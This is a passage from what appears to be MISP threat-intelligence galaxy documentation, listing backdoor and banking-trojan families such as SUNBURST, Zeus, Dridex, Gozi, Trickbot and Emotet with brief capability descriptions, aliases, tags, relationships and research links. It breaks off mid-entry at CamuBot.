Table 442. Table References
Links
https://unit42.paloaltonetworks.com/apt41-using-new-speculoos-backdoor-to-target-organizations-globally/

Mori Backdoor

Mori Backdoor has been used by Seedworm.

The tag is: misp-galaxy:backdoor="Mori Backdoor"

Table 443. Table References
Links
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east

BazarBackdoor

Something that made the brute-force attacks on RDP connections easier was a new module of the notorious Trojan, TrickBot. It now seems that the TrickBot developers have a new tactic. Cybersecurity researchers have discovered a new phishing campaign that delivers a stealthy backdoor called BazarBackdoor, which can be used to compromise and gain full access to corporate networks. As is the case with 91% of cyberattacks, this one starts with a phishing email. A range of subjects are used to personalize the emails: Customer complaints, coronavirus-themed payroll reports, or employee termination lists. All these emails contain links to documents hosted on Google Docs. To send the malicious emails, the cybercriminals use the marketing platform Sendgrid. This campaign uses spear phishing, which means that the perpetrators have made an effort to ensure that the websites sent in the emails seem legitimate and correspond to the emails subjects.

The tag is: misp-galaxy:backdoor="BazarBackdoor"

Table 444. Table References
Links
https://www.advanced-intel.com/post/anatomy-of-attack-inside-bazarbackdoor-to-ryuk-ransomware-one-group-via-cobalt-strike
https://www.pandasecurity.com/en/mediacenter/business/bazarbackdoor-trickbot-backdoor/

SUNBURST

Backdoor.Sunburst is Malwarebytes’ detection name for a trojanized update to SolarWind’s Orion IT monitoring and management software.

The tag is: misp-galaxy:backdoor="SUNBURST"

SUNBURST is also known as:

Solarigate

View relationships graph

SUNBURST has relationships with:

dropped-by: misp-galaxy:tool="SUNSPOT" with estimative-language:likelihood-probability="likely"
used-by: misp-galaxy:microsoft-activity-group="NOBELIUM" with estimative-language:likelihood-probability="likely"

Table 445. Table References
Links
https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/
https://www.varonis.com/blog/solarwinds-sunburst-backdoor-inside-the-stealthy-apt-campaign/
https://blog.malwarebytes.com/detections/backdoor-sunburst/
https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/
https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/

Banker

A list of banker malware..

Banker is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.

authors: Unknown - raw-data

Zeus

Zeus is a trojan horse that is primarily delivered via drive-by-downloads, malvertising, exploit kits and malspam campaigns. It uses man-in-the-browser keystroke logging and form grabbing to steal information from victims. Source was leaked in 2011.

The tag is: misp-galaxy:banker="Zeus"

Zeus is also known as:

Zbot

View relationships graph

Zeus has relationships with:

similar: misp-galaxy:tool="Zeus" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:botnet="Zeus" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Zeus" with estimative-language:likelihood-probability="likely"

Table 446. Table References
Links
https://usa.kaspersky.com/resource-center/threats/zeus-virus

Vawtrak

Delivered primarily by exploit kits as well as malspam campaigns utilizing macro based Microsoft Office documents as attachments. Vawtrak/Neverquest is a modularized banking trojan designed to steal credentials through harvesting, keylogging, Man-In-The-Browser, etc.

The tag is: misp-galaxy:banker="Vawtrak"

Vawtrak is also known as:

Neverquest

View relationships graph

Vawtrak has relationships with:

similar: misp-galaxy:tool="Vawtrak" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Vawtrak" with estimative-language:likelihood-probability="likely"

Table 447. Table References
Links
https://www.kaspersky.com/blog/neverquest-trojan-built-to-steal-from-hundreds-of-banks/3247/
https://www.fidelissecurity.com/threatgeek/2016/05/vawtrak-trojan-bank-it-evolving
https://www.proofpoint.com/us/threat-insight/post/In-The-Shadows
https://www.botconf.eu/wp-content/uploads/2016/11/2016-Vawtrak-technical-report.pdf

Dridex

Dridex leverages redirection attacks designed to send victims to malicious replicas of the banking sites they think they're visiting.

The tag is: misp-galaxy:banker="Dridex"

Dridex is also known as:

Feodo Version D
Cridex

View relationships graph

Dridex has relationships with:

similar: misp-galaxy:tool="Dridex" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Dridex" with estimative-language:likelihood-probability="likely"

Table 448. Table References
Links
https://blog.malwarebytes.com/detections/trojan-dridex/
https://feodotracker.abuse.ch/

Gozi

Banking trojan delivered primarily via email (typically malspam) and exploit kits. Gozi 1.0 source leaked in 2010

The tag is: misp-galaxy:banker="Gozi"

Gozi is also known as:

Ursnif
CRM
Snifula
Papras

View relationships graph

Gozi has relationships with:

similar: misp-galaxy:tool="Snifula" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Gozi" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Snifula" with estimative-language:likelihood-probability="likely"

Table 449. Table References
Links
https://www.secureworks.com/research/gozi
https://www.gdatasoftware.com/blog/2016/11/29325-analysis-ursnif-spying-on-your-data-since-2007
https://lokalhost.pl/gozi_tree.txt

Goziv2

Banking trojan attributed to Project Blitzkrieg targeting U.S. Financial institutions.

The tag is: misp-galaxy:banker="Goziv2"

Goziv2 is also known as:

Prinimalka

Table 450. Table References
Links
https://krebsonsecurity.com/tag/gozi-prinimalka/
https://securityintelligence.com/project-blitzkrieg-how-to-block-the-planned-prinimalka-gozi-trojan-attack/
https://lokalhost.pl/gozi_tree.txt

Gozi ISFB

Banking trojan based on Gozi source. Features include web injects for the victims’ browsers, screenshoting, video recording, transparent redirections, etc. Source leaked ~ end of 2015.

The tag is: misp-galaxy:banker="Gozi ISFB"

View relationships graph

Gozi ISFB has relationships with:

similar: misp-galaxy:malpedia="ISFB" with estimative-language:likelihood-probability="likely"

Table 451. Table References
Links
https://www.govcert.admin.ch/blog/18/gozi-isfb-when-a-bug-really-is-a-feature
https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/
https://info.phishlabs.com/blog/the-unrelenting-evolution-of-vawtrak
https://lokalhost.pl/gozi_tree.txt

Dreambot

Dreambot is a variant of Gozi ISFB that is spread via numerous exploit kits as well as through malspam email attachments and links.

The tag is: misp-galaxy:banker="Dreambot"

Table 452. Table References
Links
https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/
https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality
https://lokalhost.pl/gozi_tree.txt

IAP

Gozi ISFB variant

The tag is: misp-galaxy:banker="IAP"

View relationships graph

IAP has relationships with:

similar: misp-galaxy:malpedia="ISFB" with estimative-language:likelihood-probability="likely"

Table 453. Table References
Links
https://lokalhost.pl/gozi_tree.txt
http://archive.is/I7hi8#selection-217.0-217.6

GozNym

GozNym hybrid takes the best of both the Nymaim and Gozi ISFB. From the Nymaim malware, it leverages the dropper’s stealth and persistence; the Gozi ISFB parts add the banking Trojan’s capabilities to facilitate fraud via infected Internet browsers.

The tag is: misp-galaxy:banker="GozNym"

Table 454. Table References
Links
https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/
https://lokalhost.pl/gozi_tree.txt

Zloader Zeus

Zloader is a loader that loads different payloads, one of which is a Zeus module. Delivered via exploit kits and malspam emails.

The tag is: misp-galaxy:banker="Zloader Zeus"

Zloader Zeus is also known as:

Zeus Terdot

View relationships graph

Zloader Zeus has relationships with:

similar: misp-galaxy:malpedia="Zloader" with estimative-language:likelihood-probability="likely"

Table 455. Table References
Links
https://blog.threatstop.com/zloader/terdot-that-man-in-the-middle
https://www.scmagazine.com/terdot-zloaderzbot-combo-abuses-certificate-app-to-pull-off-mitm-browser-attacks/article/634443/

Zeus VM

Zeus variant that utilizes steganography in image files to retrieve configuration file.

The tag is: misp-galaxy:banker="Zeus VM"

Zeus VM is also known as:

VM Zeus

View relationships graph

Zeus VM has relationships with:

similar: misp-galaxy:malpedia="VM Zeus" with estimative-language:likelihood-probability="likely"

Table 456. Table References
Links
https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/
https://securityintelligence.com/new-zberp-trojan-discovered-zeus-zbot-carberp/

Zeus Sphinx

Sphinx is a modular banking trojan that is a commercial offering sold to cybercriminals via underground fraudster boards.

The tag is: misp-galaxy:banker="Zeus Sphinx"

View relationships graph

Zeus Sphinx has relationships with:

similar: misp-galaxy:malpedia="Zeus Sphinx" with estimative-language:likelihood-probability="likely"

Table 457. Table References
Links
https://securityintelligence.com/brazil-cant-catch-a-break-after-panda-comes-the-sphinx/

Panda Banker

Zeus like banking trojan that is delivered primarily through malspam emails and exploit kits.

The tag is: misp-galaxy:banker="Panda Banker"

Panda Banker is also known as:

Zeus Panda

Table 458. Table References
Links
https://www.proofpoint.com/us/threat-insight/post/panda-banker-new-banking-trojan-hits-the-market
https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf
https://www.proofpoint.com/us/threat-insight/post/zeus-panda-banking-trojan-targets-online-holiday-shoppers

Zeus KINS

Zeus KINS is a modified version of ZeuS 2.0.8.9. It contains an encrypted version of it’s config in the registry.

The tag is: misp-galaxy:banker="Zeus KINS"

Zeus KINS is also known as:

Kasper Internet Non-Security
Maple

View relationships graph

Zeus KINS has relationships with:

similar: misp-galaxy:malpedia="KINS" with estimative-language:likelihood-probability="likely"

Table 459. Table References
Links
https://securityintelligence.com/zeus-maple-variant-targets-canadian-online-banking-customers/
https://github.com/nyx0/KINS

Chthonic

Chthonic according to Kaspersky is an evolution of Zeus VM. It uses the same encryptor as Andromeda bot, the same encryption scheme as Zeus AES and Zeus V2 Trojans, and a virtual machine similar to that used in ZeusVM and KINS malware.

The tag is: misp-galaxy:banker="Chthonic"

Chthonic is also known as:

Chtonic

View relationships graph

Chthonic has relationships with:

similar: misp-galaxy:malpedia="Chthonic" with estimative-language:likelihood-probability="likely"

Table 460. Table References
Links
https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan
https://securelist.com/chthonic-a-new-modification-of-zeus/68176/

Trickbot

Trickbot is a bot that is delivered via exploit kits and malspam campaigns. The bot is capable of downloading modules, including a banker module. Trickbot also shares roots with the Dyre banking trojan

The tag is: misp-galaxy:banker="Trickbot"

Trickbot is also known as:

Trickster
Trickloader

View relationships graph

Trickbot has relationships with:

similar: misp-galaxy:tool="Trick Bot" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="TrickBot" with estimative-language:likelihood-probability="likely"

Table 461. Table References
Links
https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/
https://blog.malwarebytes.com/threat-analysis/2017/08/trickbot-comes-with-new-tricks-attacking-outlook-and-browsing-data/
http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/trickbots-bag-of-tricks.html
https://www.flashpoint-intel.com/blog/new-version-trickbot-adds-worm-propagation-module/
https://www.bleepingcomputer.com/news/security/trickbot-banking-trojan-starts-stealing-windows-problem-history/

Dyre

Dyre is a banking trojan distributed via exploit kits and malspam emails primarily. It has a modular architectur and utilizes man-in-the-browser functionality. It also leverages a backconnect server that allows threat actors to connect to a bank website through the victim’s computer.

The tag is: misp-galaxy:banker="Dyre"

Dyre is also known as:

Dyreza

View relationships graph

Dyre has relationships with:

similar: misp-galaxy:mitre-malware="Dyre - S0024" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Dyre" with estimative-language:likelihood-probability="likely"

Table 462. Table References
Links
https://www.secureworks.com/research/dyre-banking-trojan
https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/

Tinba

Tinba is a very small banking trojan that hooks into browsers and steals login data and sniffs on network traffic. It also uses Man in The Browser (MiTB) and webinjects. Tinba is primarily delivered via exploit kits, malvertising and malspam email campaigns.

The tag is: misp-galaxy:banker="Tinba"

Tinba is also known as:

Zusy
TinyBanker
illi

View relationships graph

Tinba has relationships with:

similar: misp-galaxy:tool="Tinba" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Tinba" with estimative-language:likelihood-probability="likely"

Table 463. Table References
Links
https://securityblog.switch.ch/2015/06/18/so-long-and-thanks-for-all-the-domains/
http://securityintelligence.com/tinba-malware-reloaded-and-attacking-banks-around-the-world/
https://blog.avast.com/2014/09/15/tiny-banker-trojan-targets-customers-of-major-banks-worldwide/
http://my.infotex.com/tiny-banker-trojan/

Geodo

Geodo is a banking trojan delivered primarily through malspam emails. It is capable of sniffing network activity to steal information by hooking certain network API calls.

The tag is: misp-galaxy:banker="Geodo"

Geodo is also known as:

Feodo Version C
Emotet

View relationships graph

Geodo has relationships with:

similar: misp-galaxy:tool="Emotet" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Emotet" with estimative-language:likelihood-probability="likely"

Table 464. Table References
Links
https://feodotracker.abuse.ch/
http://blog.trendmicro.com/trendlabs-security-intelligence/new-banking-malware-uses-network-sniffing-for-data-theft/
https://www.bleepingcomputer.com/news/security/emotet-banking-trojan-loves-usa-internet-providers/
https://www.bleepingcomputer.com/news/security/emotet-returns-with-thanksgiving-theme-and-better-phishing-tricks/
https://www.forcepoint.com/blog/security-labs/thanks-giving-emotet
https://cofense.com/major-us-financial-institutions-imitated-advanced-geodo-emotet-phishing-lures-appear-authentic-containing-proofpoint-url-wrapped-links/

Feodo

Feodo is a banking trojan that utilizes web injects and is also capable of monitoring & manipulating cookies. Version A = Port 8080, Version B = Port 80 It is delivered primarily via exploit kits and malspam emails.

The tag is: misp-galaxy:banker="Feodo"

Feodo is also known as:

Bugat
Cridex

View relationships graph

Feodo has relationships with:

similar: misp-galaxy:tool="Dridex" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Feodo" with estimative-language:likelihood-probability="likely"

Table 465. Table References
Links
https://securelist.com/dridex-a-history-of-evolution/78531/
https://feodotracker.abuse.ch/
http://stopmalvertising.com/rootkits/analysis-of-cridex.html

Ramnit

Originally not a banking trojan in 2010, Ramnit became a banking trojan after the Zeus source code leak. It is capable of perforrming Man-in-the-Browser attacks. Distributed primarily via exploit kits.

The tag is: misp-galaxy:banker="Ramnit"

Ramnit is also known as:

Nimnul

View relationships graph

Ramnit has relationships with:

similar: misp-galaxy:botnet="Ramnit" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Ramnit" with estimative-language:likelihood-probability="likely"

Table 466. Table References
Links
https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/

Qakbot

Qakbot is a banking trojan that leverages webinjects to steal banking information from victims. It also utilizes DGA for command and control. It is primarily delivered via exploit kits.

The tag is: misp-galaxy:banker="Qakbot"

Qakbot is also known as:

Qbot
Pinkslipbot
Akbot

View relationships graph

Qakbot has relationships with:

similar: misp-galaxy:tool="Akbot" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="QakBot" with estimative-language:likelihood-probability="likely"

Table 467. Table References
Links
https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/
https://www.johannesbader.ch/2016/02/the-dga-of-qakbot/
https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Karve-etal.pdf

Corebot

Corebot is a modular trojan that leverages a banking module that can perform browser hooking, form grabbing, MitM, webinjection to steal financial information from victims. Distributed primarily via malspam emails and exploit kits.

The tag is: misp-galaxy:banker="Corebot"

View relationships graph

Corebot has relationships with:

similar: misp-galaxy:malpedia="Corebot" with estimative-language:likelihood-probability="likely"

Table 468. Table References
Links
https://securityintelligence.com/an-overnight-sensation-corebot-returns-as-a-full-fledged-financial-malware/
https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/02/ASERT-Threat-Intelligence-Brief-2016-02-Corebot-1.pdf
https://malwarebreakdown.com/2017/09/11/re-details-malspam-downloads-corebot-banking-trojan/

TinyNuke

TinyNuke is a modular banking trojan that includes a HiddenDesktop/VNC server and reverse SOCKS 4 server. It’s main functionality is to make web injections into specific pages to steal user data. Distributed primarily via malspam emails and exploit kits.

The tag is: misp-galaxy:banker="TinyNuke"

TinyNuke is also known as:

NukeBot
Nuclear Bot
MicroBankingTrojan
Xbot

View relationships graph

TinyNuke has relationships with:

similar: misp-galaxy:mitre-tool="Xbot - S0298" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Xbot" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="TinyNuke" with estimative-language:likelihood-probability="likely"

Table 469. Table References
Links
https://securelist.com/the-nukebot-banking-trojan-from-rough-drafts-to-real-threats/78957/
https://www.arbornetworks.com/blog/asert/dismantling-nuclear-bot/
https://securityintelligence.com/the-nukebot-trojan-a-bruised-ego-and-a-surprising-source-code-leak/
http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4596
https://benkowlab.blogspot.ca/2017/08/quick-look-at-another-alina-fork-xbot.html

Retefe

Retefe is a banking trojan that is distributed by what SWITCH CERT calls the Retefe gang or Operation Emmental. It uses geolocation based targeting. It also leverages fake root certificate and changes the DNS server for domain name resolution in order to display fake banking websites to victims. It is spread primarily through malspam emails.

The tag is: misp-galaxy:banker="Retefe"

Retefe is also known as:

Tsukuba
Werdlod

View relationships graph

Retefe has relationships with:

similar: misp-galaxy:malpedia="Retefe (Android)" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Dok" with estimative-language:likelihood-probability="likely"

Table 470. Table References
Links
https://www.govcert.admin.ch/blog/33/the-retefe-saga
https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/
https://countuponsecurity.com/2016/02/29/retefe-banking-trojan/
https://securityblog.switch.ch/2014/11/05/retefe-with-a-new-twist/
http://securityintelligence.com/tsukuba-banking-trojan-phishing-in-japanese-waters/

ReactorBot

ReactorBot is sometimes mistakenly tagged as Rovnix. ReactorBot is a full fledged modular bot that includes a banking module that has roots with the Carberp banking trojan. Distributed primarily via malspam emails.

The tag is: misp-galaxy:banker="ReactorBot"

View relationships graph

ReactorBot has relationships with:

similar: misp-galaxy:malpedia="ReactorBot" with estimative-language:likelihood-probability="likely"

Table 471. Table References
Links
http://www.malwaredigger.com/2015/06/rovnix-payload-and-plugin-analysis.html
https://www.symantec.com/connect/blogs/new-carberp-variant-heads-down-under
http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html
http://blog.trendmicro.com/trendlabs-security-intelligence/rovnix-infects-systems-with-password-protected-macros/

Matrix Banker

Matrix Banker is named accordingly because of the Matrix reference in it’s C2 panel. Distributed primarily via malspam emails.

The tag is: misp-galaxy:banker="Matrix Banker"

View relationships graph

Matrix Banker has relationships with:

similar: misp-galaxy:malpedia="Matrix Banker" with estimative-language:likelihood-probability="likely"

Table 472. Table References
Links
https://www.arbornetworks.com/blog/asert/another-banker-enters-matrix/

Zeus Gameover

Zeus Gameover captures banking credentials from infected computers, then use those credentials to initiate or re-direct wire transfers to accounts overseas that are controlled by the criminals. GameOver has a decentralized, peer-to-peer command and control infrastructure rather than centralized points of origin. Distributed primarily via malspam emails and exploit kits.

The tag is: misp-galaxy:banker="Zeus Gameover"

Table 473. Table References
Links
https://heimdalsecurity.com/blog/zeus-gameover/
https://www.us-cert.gov/ncas/alerts/TA14-150A

SpyEye

SpyEye is a similar to the Zeus botnet banking trojan. It utilizes a web control panel for C2 and can perform form grabbing, autofill credit card modules, ftp grabber, pop3 grabber and HTTP basic access authorization grabber. It also contained a Kill Zeus feature which would remove any Zeus infections if SpyEye was on the system. Distributed primarily via exploit kits and malspam emails.

The tag is: misp-galaxy:banker="SpyEye"

Table 474. Table References
Links
https://www.ioactive.com/pdfs/ZeusSpyEyeBankingTrojanAnalysis.pdf
https://www.computerworld.com/article/2509482/security0/spyeye-trojan-defeating-online-banking-defenses.html
https://www.symantec.com/connect/blogs/spyeye-bot-versus-zeus-bot

Citadel

Citadel is an offspring of the Zeus banking trojan. Delivered primarily via exploit kits.

The tag is: misp-galaxy:banker="Citadel"

View relationships graph

Citadel has relationships with:

similar: misp-galaxy:malpedia="Citadel" with estimative-language:likelihood-probability="likely"

Table 475. Table References
Links
https://blog.malwarebytes.com/threat-analysis/2012/11/citadel-a-cyber-criminals-ultimate-weapon/
https://krebsonsecurity.com/tag/citadel-trojan/
https://securityintelligence.com/cybercriminals-use-citadel-compromise-password-management-authentication-solutions/

Atmos

Atmos is derived from the Citadel banking trojan. Delivered primarily via exploit kits and malspam emails.

The tag is: misp-galaxy:banker="Atmos"

Table 476. Table References
Links
https://heimdalsecurity.com/blog/security-alert-citadel-trojan-resurfaces-atmos-zeus-legacy/
http://www.xylibox.com/2016/02/citadel-0011-atmos.html

Ice IX

Ice IX is a bot created using the source code of ZeuS 2.0.8.9. No major improvements compared to ZeuS 2.0.8.9.

The tag is: misp-galaxy:banker="Ice IX"

View relationships graph

Ice IX has relationships with:

similar: misp-galaxy:malpedia="Ice IX" with estimative-language:likelihood-probability="likely"

Table 477. Table References
Links
https://securelist.com/ice-ix-not-cool-at-all/29111/ [https://securelist.com/ice-ix-not-cool-at-all/29111/ ]

Zitmo

Zeus in the mobile. Banking trojan developed for mobile devices such as Windows Mobile, Blackberry and Android.

The tag is: misp-galaxy:banker="Zitmo"

Table 478. Table References
Links
https://securelist.com/zeus-in-the-mobile-for-android-10/29258/

Licat

Banking trojan based on Zeus V2. Murofet is a newer version of Licat found ~end of 2011

The tag is: misp-galaxy:banker="Licat"

Licat is also known as:

Murofet

View relationships graph

Licat has relationships with:

similar: misp-galaxy:malpedia="Murofet" with estimative-language:likelihood-probability="likely"

Table 479. Table References
Links
https://johannesbader.ch/2015/09/three-variants-of-murofets-dga/
https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/PE_LICAT.A
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Virus%3aWin32%2fMurofet.A

Skynet

Skynet is a Tor-powered trojan with DDoS, Bitcoin mining and Banking capabilities. Spread via USENET as per rapid7.

The tag is: misp-galaxy:banker="Skynet"

Table 480. Table References
Links
https://blog.rapid7.com/2012/12/06/skynet-a-tor-powered-botnet-straight-from-reddit/

IcedID

According to X-Force research, the new banking Trojan emerged in the wild in September 2017, when its first test campaigns were launched. Our researchers noted that IcedID has a modular malicious code with modern banking Trojan capabilities comparable to malware such as the Zeus Trojan. At this time, the malware targets banks, payment card providers, mobile services providers, payroll, webmail and e-commerce sites in the U.S. Two major banks in the U.K. are also on the target list the malware fetches.

The tag is: misp-galaxy:banker="IcedID"

View relationships graph

IcedID has relationships with:

similar: misp-galaxy:malpedia="IcedID" with estimative-language:likelihood-probability="likely"

Table 481. Table References
Links
https://www.bleepingcomputer.com/news/security/new-icedid-banking-trojan-discovered/
https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/
http://blog.talosintelligence.com/2018/04/icedid-banking-trojan.html

GratefulPOS

GratefulPOS has the following functions 1. Access arbitrary processes on the target POS system 2. Scrape track 1 and 2 payment card data from the process(es) 3. Exfiltrate the payment card data via lengthy encoded and obfuscated DNS queries to a hardcoded domain registered and controlled by the perpetrators, similar to that described by Paul Rascagneres in his analysis of FrameworkPOS in 2014[iii], and more recently by Luis Mendieta of Anomoli in analysis of a precursor to this sample.

The tag is: misp-galaxy:banker="GratefulPOS"

View relationships graph

GratefulPOS has relationships with:

similar: misp-galaxy:tool="GratefulPOS" with estimative-language:likelihood-probability="likely"

Table 482. Table References
Links
https://community.rsa.com/community/products/netwitness/blog/2017/12/08/gratefulpos-credit-card-stealing-malware-just-in-time-for-the-shopping-season

Dok

A macOS banking trojan that that redirects an infected user’s web traffic in order to extract banking credentials.

The tag is: misp-galaxy:banker="Dok"

View relationships graph

Dok has relationships with:

similar: misp-galaxy:malpedia="Retefe (Android)" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Dok" with estimative-language:likelihood-probability="likely"

Table 483. Table References
Links
https://objective-see.com/blog/blog_0x25.html#Dok

downAndExec

Services like Netflix use content delivery networks (CDNs) to maximize bandwidth usage as it gives users greater speed when viewing the content, as the server is close to them and is part of the Netflix CDN. This results in faster loading times for series and movies, wherever you are in the world. But, apparently, the CDNs are starting to become a new way of spreading malware. The attack chain is very extensive, and incorporates the execution of remote scripts (similar in some respects to the recent “fileless” banking malware trend), plus the use of CDNs for command and control (C&C), and other standard techniques for the execution and protection of malware.

The tag is: misp-galaxy:banker="downAndExec"

Table 484. Table References
Links
https://www.welivesecurity.com/2017/09/13/downandexec-banking-malware-cdns-brazil/

Smominru

Since the end of May 2017, we have been monitoring a Monero miner that spreads using the EternalBlue Exploit (CVE-2017-0144). The miner itself, known as Smominru (aka Ismo) has been well-documented, so we will not discuss its post-infection behavior. However, the miner’s use of Windows Management Infrastructure is unusual among coin mining malware. The speed at which mining operations conduct mathematical operations to unlock new units of cryptocurrency is referred to as “hash power”. Based on the hash power associated with the Monero payment address for this operation, it appeared that this botnet was likely twice the size of Adylkuzz. The operators had already mined approximately 8,900 Monero (valued this week between $2.8M and $3.6M). Each day, the botnet mined roughly 24 Monero, worth an average of $8,500 this week.

The tag is: misp-galaxy:banker="Smominru"

Smominru is also known as:

Ismo
lsmo

View relationships graph

Smominru has relationships with:

similar: misp-galaxy:malpedia="Smominru" with estimative-language:likelihood-probability="likely"

Table 485. Table References
Links
https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators

DanaBot

It’s a Trojan that includes banking site web injections and stealer functions. It consists of a downloader component that downloads an encrypted file containing the main DLL. The DLL, in turn, connects using raw TCP connections to port 443 and downloads additional modules (i.e. VNCDLL.dll, StealerDLL.dll, ProxyDLL.dll)

The tag is: misp-galaxy:banker="DanaBot"

View relationships graph

DanaBot has relationships with:

similar: misp-galaxy:malpedia="DanaBot" with estimative-language:likelihood-probability="likely"

Table 486. Table References
Links
https://www.proofpoint.com/us/threat-insight/post/danabot-new-banking-trojan-surfaces-down-under-0
https://www.bleepingcomputer.com/news/security/danabot-banking-malware-now-targeting-banks-in-the-us/

Backswap

The banker is distributed through malicious email spam campaigns. Instead of using complex process injection methods to monitor browsing activity, the malware hooks key Windows message loop events in order to inspect values of the window objects for banking activity. The payload is delivered as a modified version of a legitimate application that is partially overwritten by the malicious payload

The tag is: misp-galaxy:banker="Backswap"

Table 487. Table References
Links
https://www.cert.pl/news/single/analiza-zlosliwego-oprogramowania-backswap/
https://www.welivesecurity.com/2018/05/25/backswap-malware-empty-bank-accounts/

Bebloh

The tag is: misp-galaxy:banker="Bebloh"

Bebloh is also known as:

URLZone
Shiotob

View relationships graph

Bebloh has relationships with:

similar: misp-galaxy:malpedia="UrlZone" with estimative-language:likelihood-probability="likely"

Table 488. Table References
Links
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Bebloh.A
https://www.symantec.com/security-center/writeup/2011-041411-0912-99

Banjori

The tag is: misp-galaxy:banker="Banjori"

Banjori is also known as:

MultiBanker 2
BankPatch
BackPatcher

View relationships graph

Banjori has relationships with:

similar: misp-galaxy:malpedia="Banjori" with estimative-language:likelihood-probability="likely"

Table 489. Table References
Links
https://www.johannesbader.ch/2015/02/the-dga-of-banjori/

Qadars

The tag is: misp-galaxy:banker="Qadars"

View relationships graph

Qadars has relationships with:

similar: misp-galaxy:malpedia="Qadars" with estimative-language:likelihood-probability="likely"

Table 490. Table References
Links
https://www.countercept.com/our-thinking/decrypting-qadars-banking-trojan-c2-traffic/

Sisron

The tag is: misp-galaxy:banker="Sisron"

Table 491. Table References
Links
https://www.johannesbader.ch/2016/06/the-dga-of-sisron/

Ranbyus

The tag is: misp-galaxy:banker="Ranbyus"

View relationships graph

Ranbyus has relationships with:

similar: misp-galaxy:malpedia="Ranbyus" with estimative-language:likelihood-probability="likely"

Table 492. Table References
Links
https://www.johannesbader.ch/2016/06/the-dga-of-sisron/

Fobber

The tag is: misp-galaxy:banker="Fobber"

View relationships graph

Fobber has relationships with:

similar: misp-galaxy:malpedia="Fobber" with estimative-language:likelihood-probability="likely"

Table 493. Table References
Links
https://searchfinancialsecurity.techtarget.com/news/4500249201/Fobber-Drive-by-financial-malware-returns-with-new-tricks

Karius

Trojan under development and already being distributed through the RIG Exploit Kit. Observed code similarities with other well-known bankers such as Ramnit, Vawtrak and TrickBot. Karius works in a rather traditional fashion to other banking malware and consists of three components (injector32\64.exe, proxy32\64.dll and mod32\64.dll), these components essentially work together to deploy webinjects in several browsers.

The tag is: misp-galaxy:banker="Karius"

View relationships graph

Karius has relationships with:

similar: misp-galaxy:malpedia="Karius" with estimative-language:likelihood-probability="likely"

Table 494. Table References
Links
https://research.checkpoint.com/banking-trojans-development/

Kronos

Kronos was a type of banking malware first reported in 2014. It was sold for $7000. As of September 2015, a renew version was reconnecting with infected bots and sending them a brand new configuration file against U.K. banks and one bank in India. Similar to Zeus it was focused on stealing banking login credentials from browser sessions. A new version of this malware appears to have been used in 2018, the main difference is that the 2018 edition uses Tor-hosted C&C control panels.

The tag is: misp-galaxy:banker="Kronos"

View relationships graph

Kronos has relationships with:

similar: misp-galaxy:malpedia="Kronos" with estimative-language:likelihood-probability="likely"

Table 495. Table References
Links
https://en.wikipedia.org/wiki/Kronos_(malware)
https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware
https://www.bleepingcomputer.com/news/security/new-version-of-the-kronos-banking-trojan-discovered/

CamuBot

A newly discovered banking Trojan departs from the regular tactics observed by malware researchers by choosing visible installation and by adding social engineering components. CamuBot appeared last month in Brazil targeting companies and organizations from the public sector. The victim is the one installing the malware, at the instructions of a human operator that pretends to be a bank employee.

The tag is: misp-galaxy:banker="CamuBot"

View relationships graph

CamuBot has relationships with:

